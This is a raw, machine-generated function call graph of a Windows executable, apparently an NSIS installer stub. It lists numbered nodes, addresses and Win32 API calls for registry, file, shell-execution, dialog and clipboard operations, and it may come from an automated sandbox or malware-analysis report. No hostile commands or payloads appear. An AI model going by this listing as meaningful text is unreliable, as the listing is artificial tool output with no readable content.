3278->3281 3282 402cca 3279->3282 3280->3281 3281->3179 3282->3179 3283->3187 3284->3185 3286 403a04 3285->3286 3296 405c8d wsprintfW 3286->3296 3288 403a75 3289 405d68 18 API calls 3288->3289 3290 403a81 SetWindowTextW 3289->3290 3291 4037a5 3290->3291 3292 403a9d 3290->3292 3291->3209 3292->3291 3293 405d68 18 API calls 3292->3293 3293->3292 3294->3205 3295->3211 3296->3288 3298 403693 3297->3298 3299 40365d 3298->3299 3300 403698 FreeLibrary GlobalFree 3298->3300 3299->3258 3300->3299 3300->3300 3374 4023de 3385 402bda 3374->3385 3376 4023e8 3377 402ad0 18 API calls 3376->3377 3378 4023f1 3377->3378 3379 402729 3378->3379 3380 4023fc RegQueryValueExW 3378->3380 3381 40241c 3380->3381 3384 402422 RegCloseKey 3380->3384 3381->3384 3389 405c8d wsprintfW 3381->3389 3384->3379 3386 402ad0 18 API calls 3385->3386 3387 402bf3 3386->3387 3388 402c01 RegOpenKeyExW 3387->3388 3388->3376 3389->3384 3595 40165e 3596 402ad0 18 API calls 3595->3596 3597 401665 3596->3597 3598 402ad0 18 API calls 3597->3598 3599 40166e 3598->3599 3600 402ad0 18 API calls 3599->3600 3601 401677 MoveFileW 3600->3601 3602 401683 3601->3602 3603 40168a 3601->3603 3605 401423 25 API calls 3602->3605 3604 406089 2 API calls 3603->3604 3607 402195 3603->3607 3606 401699 3604->3606 3605->3607 3606->3607 3608 405be0 40 API calls 3606->3608 3608->3602 3609 4040e3 lstrlenW 3610 404102 3609->3610 3611 404104 WideCharToMultiByte 3609->3611 3610->3611 3612 401ce5 GetDlgItem GetClientRect 3613 402ad0 18 API calls 3612->3613 3614 401d17 LoadImageW SendMessageW 3613->3614 3615 401d35 DeleteObject 3614->3615 3616 40295d 3614->3616 3615->3616 3617 4043e9 3618 4043f9 3617->3618 3619 40441f 3617->3619 3621 403f95 19 API calls 3618->3621 3620 403ffc 8 API calls 3619->3620 3622 40442b 3620->3622 3623 404406 SetDlgItemTextW 3621->3623 3623->3619 3624 40206a 3625 402ad0 18 API calls 3624->3625 3626 402071 3625->3626 3627 402ad0 18 API calls 3626->3627 3628 40207b 3627->3628 3629 402ad0 18 API calls 3628->3629 3630 402084 3629->3630 3631 402ad0 18 API calls 3630->3631 3632 40208e 3631->3632 3633 402ad0 18 API calls 3632->3633 3634 402098 3633->3634 3635 4020ac CoCreateInstance 3634->3635 3636 402ad0 18 API calls 3634->3636 3639 4020cb 3635->3639 3636->3635 3637 401423 25 API calls 3638 402195 3637->3638 3639->3637 3639->3638 3640 40156b 3641 401584 3640->3641 3642 40157b ShowWindow 3640->3642 3643 401592 ShowWindow 3641->3643 3644 40295d 3641->3644 3642->3641 3643->3644 3645 4024ec 3646 4024f1 3645->3646 3647 40250a 3645->3647 3648 402ab3 18 API calls 3646->3648 3649 402510 3647->3649 3650 40253c 3647->3650 3651 4024f8 3648->3651 3652 402ad0 18 API calls 3649->3652 3653 402ad0 18 API calls 3650->3653 3656 402565 WriteFile 3651->3656 3657 402729 3651->3657 3654 402517 WideCharToMultiByte lstrlenA 3652->3654 3655 402543 lstrlenW 3653->3655 3654->3651 3655->3651 3656->3657 3658 404f6e 3659 404f92 3658->3659 3660 404f7e 3658->3660 3663 404f9a IsWindowVisible 3659->3663 3669 404fb1 3659->3669 3661 404f84 3660->3661 3662 404fdb 3660->3662 3665 403fe1 SendMessageW 3661->3665 3664 404fe0 CallWindowProcW 3662->3664 3663->3662 3666 404fa7 3663->3666 3667 404f8e 3664->3667 3665->3667 3671 4048c4 SendMessageW 3666->3671 3669->3664 3676 404944 3669->3676 3672 404923 SendMessageW 3671->3672 3673 4048e7 GetMessagePos ScreenToClient SendMessageW 3671->3673 3675 40491b 3672->3675 3674 404920 3673->3674 3673->3675 3674->3672 3675->3669 3685 405d46 lstrcpynW 3676->3685 3678 404957 3686 405c8d wsprintfW 3678->3686 3680 404961 3681 40140b 2 API calls 3680->3681 3682 40496a 3681->3682 3687 405d46 lstrcpynW 3682->3687 3684 404971 3684->3662 3685->3678 3686->3680 3687->3684 3688 4018ef 3689 401926 3688->3689 3690 402ad0 18 API calls 3689->3690 3691 40192b 3690->3691 3692 4055d5 71 API calls 3691->3692 3693 401934 3692->3693 3694 402571 3695 402ab3 18 API calls 3694->3695 3699 40257a 3695->3699 3696 4025c1 ReadFile 3696->3699 3704 402642 3696->3704 3697 4025fe ReadFile 3697->3699 3697->3704 3698 4025de MultiByteToWideChar 3698->3699 3699->3696 3699->3697 3699->3698 3700 402644 3699->3700 3701 402655 3699->3701 3699->3704 3705 405c8d wsprintfW 3700->3705 3703 402671 SetFilePointer 3701->3703 3701->3704 3703->3704 3705->3704 3706 4014f1 SetForegroundWindow 3707 40295d 3706->3707 3708 4018f2 3709 402ad0 18 API calls 3708->3709 3710 4018f9 3709->3710 3711 405529 MessageBoxIndirectW 3710->3711 3712 401902 3711->3712 3713 401df3 3714 402ad0 18 API calls 3713->3714 3715 401df9 3714->3715 3716 402ad0 18 API calls 3715->3716 3717 401e02 3716->3717 3718 402ad0 18 API calls 3717->3718 3719 401e0b 3718->3719 3720 402ad0 18 API calls 3719->3720 3721 401e14 3720->3721 3722 401423 25 API calls 3721->3722 3723 401e1b ShellExecuteW 3722->3723 3724 401e4c 3723->3724 3730 404976 GetDlgItem GetDlgItem 3731 4049c8 7 API calls 3730->3731 3740 404be1 3730->3740 3732 404a6b DeleteObject 3731->3732 3733 404a5e SendMessageW 3731->3733 3734 404a74 3732->3734 3733->3732 3735 404aab 3734->3735 3739 405d68 18 API calls 3734->3739 3737 403f95 19 API calls 3735->3737 3736 404cc5 3738 404d71 3736->3738 3748 404d1e SendMessageW 3736->3748 3769 404bd4 3736->3769 3741 404abf 3737->3741 3742 404d83 3738->3742 3743 404d7b SendMessageW 3738->3743 3744 404a8d SendMessageW SendMessageW 3739->3744 3740->3736 3746 4048c4 5 API calls 3740->3746 3773 404c52 3740->3773 3747 403f95 19 API calls 3741->3747 3745 404dac 3742->3745 3751 404d95 ImageList_Destroy 3742->3751 3752 404d9c 3742->3752 3743->3742 3744->3734 3754 404f1b 3745->3754 3772 404944 4 API calls 3745->3772 3777 404de7 3745->3777 3746->3773 3753 404acd 3747->3753 3755 404d33 SendMessageW 3748->3755 3748->3769 3749 403ffc 8 API calls 3756 404f67 3749->3756 3750 404cb7 SendMessageW 3750->3736 3751->3752 3752->3745 3757 404da5 GlobalFree 3752->3757 3758 404ba2 GetWindowLongW SetWindowLongW 3753->3758 3766 404b1d SendMessageW 3753->3766 3768 404b9c 3753->3768 3770 404b59 SendMessageW 3753->3770 3771 404b6a SendMessageW 3753->3771 3759 404f2d ShowWindow GetDlgItem ShowWindow 3754->3759 3754->3769 3763 404d46 3755->3763 3757->3745 3760 404bbb 3758->3760 3759->3769 3761 404bc1 ShowWindow 3760->3761 3762 404bd9 3760->3762 3781 403fca SendMessageW 3761->3781 3782 403fca SendMessageW 3762->3782 3767 404d57 SendMessageW 3763->3767 3766->3753 3767->3738 3768->3758 3768->3760 3769->3749 3770->3753 3771->3753 3772->3777 3773->3736 3773->3750 3774 404ef1 InvalidateRect 3774->3754 3775 404f07 3774->3775 3783 4047de 3775->3783 3776 404e15 SendMessageW 3780 404e2b 3776->3780 3777->3776 3777->3780 3779 404e9f SendMessageW SendMessageW 3779->3780 3780->3774 3780->3779 3781->3769 3782->3740 3784 4047fb 3783->3784 3785 405d68 18 API calls 3784->3785 3786 404830 3785->3786 3787 405d68 18 API calls 3786->3787 3788 40483b 3787->3788 3789 405d68 18 API calls 3788->3789 3790 40486c lstrlenW wsprintfW SetDlgItemTextW 3789->3790 3790->3754 3791 404778 3792 4047a4 3791->3792 3793 404788 3791->3793 3795 4047d7 3792->3795 3796 4047aa SHGetPathFromIDListW 3792->3796 3802 40550d GetDlgItemTextW 3793->3802 3798 4047c1 SendMessageW 3796->3798 3799 4047ba 3796->3799 3797 404795 SendMessageW 3797->3792 3798->3795 3800 40140b 2 API calls 3799->3800 3800->3798 3802->3797 3803 4014ff 3804 401507 3803->3804 3806 40151a 3803->3806 3805 402ab3 18 API calls 3804->3805 3805->3806 3807 401000 3808 401037 BeginPaint GetClientRect 3807->3808 3809 40100c DefWindowProcW 3807->3809 3811 4010f3 3808->3811 3812 401179 3809->3812 3813 401073 CreateBrushIndirect FillRect DeleteObject 3811->3813 3814 4010fc 3811->3814 3813->3811 3815 401102 CreateFontIndirectW 3814->3815 3816 401167 EndPaint 3814->3816 3815->3816 3817 401112 6 API calls 3815->3817 3816->3812 3817->3816 3818 401a00 3819 402ad0 18 API calls 3818->3819 3820 401a09 ExpandEnvironmentStringsW 3819->3820 3821 401a1d 3820->3821 3823 401a30 3820->3823 3822 401a22 lstrcmpW 3821->3822 3821->3823 3822->3823 3824 401b01 3825 402ad0 18 API calls 3824->3825 3826 401b08 3825->3826 3827 402ab3 18 API calls 3826->3827 3828 401b11 wsprintfW 3827->3828 3829 40295d 3828->3829 3830 402706 3831 402ad0 18 API calls 3830->3831 3832 40270d FindFirstFileW 3831->3832 3833 402720 3832->3833 3834 402735 3832->3834 3838 405c8d wsprintfW 3834->3838 3836 40273e 3839 405d46 lstrcpynW 3836->3839 3838->3836 3839->3833 2852 401f08 2853 402ad0 18 API calls 2852->2853 2854 401f0f GetFileVersionInfoSizeW 2853->2854 2855 401f36 GlobalAlloc 2854->2855 2856 40295d 2854->2856 2855->2856 2857 401f4a 2855->2857 2858 401f8c 2857->2858 2862 405c8d wsprintfW 2857->2862 2858->2856 2860 401f7e 2863 405c8d wsprintfW 2860->2863 2862->2860 2863->2858 3840 401c8e 3841 402ab3 18 API calls 3840->3841 3842 401c94 IsWindow 3841->3842 3843 4019f0 3842->3843 3844 40268f 3845 402696 3844->3845 3848 402908 3844->3848 3846 402ab3 18 API calls 3845->3846 3847 4026a1 3846->3847 3849 4026a8 SetFilePointer 3847->3849 3849->3848 3850 4026b8 3849->3850 3852 405c8d wsprintfW 3850->3852 3852->3848 3853 401491 3854 404ffa 25 API calls 3853->3854 3855 401498 3854->3855 2969 402293 2970 402ad0 18 API calls 2969->2970 2971 4022a2 2970->2971 2972 402ad0 18 API calls 2971->2972 2973 4022ab 2972->2973 2974 402ad0 18 API calls 2973->2974 2975 4022b5 GetPrivateProfileStringW 2974->2975 3856 402c15 3857 402c40 3856->3857 3858 402c27 SetTimer 3856->3858 3859 402c95 3857->3859 3860 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3857->3860 3858->3857 3860->3859 3861 401718 3862 402ad0 18 API calls 3861->3862 3863 40171f SearchPathW 3862->3863 3864 40173a 3863->3864 3865 401f98 3866 40205c 3865->3866 3867 401faa 3865->3867 3870 401423 25 API calls 3866->3870 3868 402ad0 18 API calls 3867->3868 3869 401fb1 3868->3869 3871 402ad0 18 API calls 3869->3871 3876 402195 3870->3876 3872 401fba 3871->3872 3873 401fd0 LoadLibraryExW 3872->3873 3874 401fc2 GetModuleHandleW 3872->3874 3873->3866 3875 401fe1 3873->3875 3874->3873 3874->3875 3885 40611c WideCharToMultiByte 3875->3885 3879 401ff2 3882 401423 25 API calls 3879->3882 3883 402002 3879->3883 3880 40202b 3881 404ffa 25 API calls 3880->3881 3881->3883 3882->3883 3883->3876 3884 40204e FreeLibrary 3883->3884 3884->3876 3886 406146 GetProcAddress 3885->3886 3887 401fec 3885->3887 3886->3887 3887->3879 3887->3880 3081 40159b 3082 402ad0 18 API calls 3081->3082 3083 4015a2 SetFileAttributesW 3082->3083 3084 4015b4 3083->3084 3888 40149e 3889 40223c 3888->3889 3890 4014ac PostQuitMessage 3888->3890 3890->3889 3891 40219e 3892 402ad0 18 API calls 3891->3892 3893 4021a4 3892->3893 3894 402ad0 18 API calls 3893->3894 3895 4021ad 3894->3895 3896 402ad0 18 API calls 3895->3896 3897 4021b6 3896->3897 3898 406089 2 API calls 3897->3898 3899 4021bf 3898->3899 3900 4021d0 lstrlenW lstrlenW 3899->3900 3901 4021c3 3899->3901 3903 404ffa 25 API calls 3900->3903 3902 404ffa 25 API calls 3901->3902 3905 4021cb 3901->3905 3902->3905 3904 40220e SHFileOperationW 3903->3904 3904->3901 3904->3905 3906 401b22 3907 401b73 3906->3907 3908 401b2f 3906->3908 3910 401b78 3907->3910 3911 401b9d GlobalAlloc 3907->3911 3909 402229 3908->3909 3915 401b46 3908->3915 3912 405d68 18 API calls 3909->3912 3921 401bb8 3910->3921 3927 405d46 lstrcpynW 3910->3927 3913 405d68 18 API calls 3911->3913 3914 402236 3912->3914 3913->3921 3920 405529 MessageBoxIndirectW 3914->3920 3925 405d46 lstrcpynW 3915->3925 3918 401b8a GlobalFree 3918->3921 3919 401b55 3926 405d46 lstrcpynW 3919->3926 3920->3921 3923 401b64 3928 405d46 lstrcpynW 3923->3928 3925->3919 3926->3923 3927->3918 3928->3921 3929 402222 3930 402229 3929->3930 3932 40223c 3929->3932 3931 405d68 18 API calls 3930->3931 3933 402236 3931->3933 3934 405529 MessageBoxIndirectW 3933->3934 3934->3932 2665 401924 2666 401926 2665->2666 2671 402ad0 2666->2671 2672 402adc 2671->2672 2718 405d68 2672->2718 2675 40192b 2677 4055d5 2675->2677 2757 4058b6 2677->2757 2680 405614 2683 405755 2680->2683 2771 405d46 lstrcpynW 2680->2771 2681 4055fd DeleteFileW 2682 401934 2681->2682 2683->2682 2801 406089 FindFirstFileW 2683->2801 2685 40563a 2686 405640 lstrcatW 2685->2686 2687 40564d 2685->2687 2689 405653 2686->2689 2772 4057fa lstrlenW 2687->2772 2692 405663 lstrcatW 2689->2692 2693 405659 2689->2693 2695 40566e lstrlenW FindFirstFileW 2692->2695 2693->2692 2693->2695 2694 405773 2804 4057ae lstrlenW CharPrevW 2694->2804 2696 40574a 2695->2696 2716 405691 2695->2716 2696->2683 2698 4057db CharNextW 2698->2716 2700 40558d 5 API calls 2701 405785 2700->2701 2702 405789 2701->2702 2703 40579f 2701->2703 2702->2682 2708 404ffa 25 API calls 2702->2708 2704 404ffa 25 API calls 2703->2704 2704->2682 2705 405729 FindNextFileW 2707 405741 FindClose 2705->2707 2705->2716 2707->2696 2709 405796 2708->2709 2711 405be0 40 API calls 2709->2711 2712 40579d 2711->2712 2712->2682 2713 4055d5 64 API calls 2713->2716 2714 404ffa 25 API calls 2714->2705 2716->2698 2716->2705 2716->2713 2716->2714 2776 405d46 lstrcpynW 2716->2776 2777 40558d 2716->2777 2785 404ffa 2716->2785 2796 405be0 2716->2796 2722 405d75 2718->2722 2719 405fc0 2720 402afd 2719->2720 2752 405d46 lstrcpynW 2719->2752 2720->2675 2736 405fda 2720->2736 2722->2719 2723 405e28 GetVersion 2722->2723 2724 405f8e lstrlenW 2722->2724 2727 405d68 10 API calls 2722->2727 2729 405ea3 GetSystemDirectoryW 2722->2729 2730 405eb6 GetWindowsDirectoryW 2722->2730 2731 405fda 5 API calls 2722->2731 2732 405d68 10 API calls 2722->2732 2733 405f2f lstrcatW 2722->2733 2734 405eea SHGetSpecialFolderLocation 2722->2734 2745 405c13 RegOpenKeyExW 2722->2745 2750 405c8d wsprintfW 2722->2750 2751 405d46 lstrcpynW 2722->2751 2723->2722 2724->2722 2727->2724 2729->2722 2730->2722 2731->2722 2732->2722 2733->2722 2734->2722 2735 405f02 SHGetPathFromIDListW CoTaskMemFree 2734->2735 2735->2722 2742 405fe7 2736->2742 2737 40605d 2738 406062 CharPrevW 2737->2738 2741 406083 2737->2741 2738->2737 2739 406050 CharNextW 2739->2737 2739->2742 2741->2675 2742->2737 2742->2739 2743 40603c CharNextW 2742->2743 2744 40604b CharNextW 2742->2744 2753 4057db 2742->2753 2743->2742 2744->2739 2746 405c87 2745->2746 2747 405c47 RegQueryValueExW 2745->2747 2746->2722 2748 405c68 RegCloseKey 2747->2748 2748->2746 2750->2722 2751->2722 2752->2720 2754 4057e1 2753->2754 2755 4057f7 2754->2755 2756 4057e8 CharNextW 2754->2756 2755->2742 2756->2754 2807 405d46 lstrcpynW 2757->2807 2759 4058c7 2808 405859 CharNextW CharNextW 2759->2808 2762 4055f5 2762->2680 2762->2681 2763 405fda 5 API calls 2769 4058dd 2763->2769 2764 40590e lstrlenW 2765 405919 2764->2765 2764->2769 2767 4057ae 3 API calls 2765->2767 2766 406089 2 API calls 2766->2769 2768 40591e GetFileAttributesW 2767->2768 2768->2762 2769->2762 2769->2764 2769->2766 2770 4057fa 2 API calls 2769->2770 2770->2764 2771->2685 2773 405808 2772->2773 2774 40581a 2773->2774 2775 40580e CharPrevW 2773->2775 2774->2689 2775->2773 2775->2774 2776->2716 2814 4059aa GetFileAttributesW 2777->2814 2780 4055ba 2780->2716 2781 4055b0 DeleteFileW 2783 4055b6 2781->2783 2782 4055a8 RemoveDirectoryW 2782->2783 2783->2780 2784 4055c6 SetFileAttributesW 2783->2784 2784->2780 2786 4050b7 2785->2786 2788 405015 2785->2788 2786->2716 2787 405031 lstrlenW 2790 40505a 2787->2790 2791 40503f lstrlenW 2787->2791 2788->2787 2789 405d68 18 API calls 2788->2789 2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 3936 401cab 3937 402ab3 18 API calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 3998->4001 4006 405d68 18 API calls 3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 3024->3026 3025->3019 3028 4053d3 AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 3302->3306 3303->3302 3304 403ae1 3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 